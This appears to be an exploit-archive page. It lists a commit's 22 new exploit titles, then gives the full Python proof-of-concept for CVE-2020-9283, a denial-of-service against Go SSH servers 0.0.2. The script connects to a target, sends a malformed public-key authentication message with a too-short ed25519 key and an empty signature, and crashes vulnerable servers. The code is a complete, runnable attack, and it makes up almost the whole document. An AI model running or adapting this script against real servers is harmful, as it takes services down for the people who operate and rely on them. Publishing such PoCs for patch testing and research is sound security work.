cf92ea269e
22 changes to exploits/shellcodes Quick N Easy Web Server 3.3.8 - Denial of Service (PoC) Go SSH servers 0.0.2 - Denial of Service (PoC) Android Binder - Use-After-Free (Metasploit) Diamorphine Rootkit - Signal Privilege Escalation (Metasploit) Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit) Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure Real Web Pentesting Tutorial Step by Step - [Persian] AMSS++ v 4.31 - 'id' SQL Injection SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin) AMSS++ 4.7 - Backdoor Admin Account SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure ATutor 2.2.4 - 'id' SQL Injection I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure ManageEngine EventLog Analyzer 10.0 - Information Disclosure eLection 2.0 - 'id' SQL Injection DotNetNuke 9.5 - Persistent Cross-Site Scripting DotNetNuke 9.5 - File Upload Restrictions Bypass Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure Cacti 1.2.8 - Remote Code Execution Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)
61 lines
No EOL
1.7 KiB
Python
Executable file
61 lines
No EOL
1.7 KiB
Python
Executable file
# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC)
|
|
# Author: Mark Adams
|
|
# Date: 2020-02-21
|
|
# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py
|
|
# CVE: CVE-2020-9283
|
|
#
|
|
# Running this script may crash the remote SSH server if it is vulnerable.
|
|
# The GitHub repository contains a vulnerable and fixed SSH server for testing.
|
|
#
|
|
# $ python poc.py
|
|
# ./poc.py <host> <port> <user>
|
|
#
|
|
# $ python poc.py localhost 2022 root
|
|
# Malformed auth request sent. This should cause a panic on the remote server.
|
|
#
|
|
|
|
#!/usr/bin/env python
|
|
|
|
import socket
|
|
import sys
|
|
|
|
import paramiko
|
|
from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST
|
|
|
|
if len(sys.argv) != 4:
|
|
print('./poc.py <host> <port> <user>')
|
|
sys.exit(1)
|
|
|
|
host = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
user = sys.argv[3]
|
|
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
sock.connect((host, port))
|
|
|
|
t = paramiko.Transport(sock)
|
|
t.start_client()
|
|
|
|
t.lock.acquire()
|
|
m = paramiko.Message()
|
|
m.add_byte(cMSG_SERVICE_REQUEST)
|
|
m.add_string("ssh-userauth")
|
|
t._send_message(m)
|
|
|
|
m = paramiko.Message()
|
|
m.add_byte(cMSG_USERAUTH_REQUEST)
|
|
m.add_string(user)
|
|
m.add_string("ssh-connection")
|
|
m.add_string('publickey')
|
|
m.add_boolean(True)
|
|
m.add_string('ssh-ed25519')
|
|
|
|
# Send an SSH key that is too short (ed25519 keys are 32 bytes)
|
|
m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x15key-that-is-too-short')
|
|
|
|
# Send an empty signature (the server won't get far enough to validate it)
|
|
m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x00')
|
|
|
|
t._send_message(m)
|
|
|
|
print('Malformed auth request sent. This should cause a panic on the remote server.') |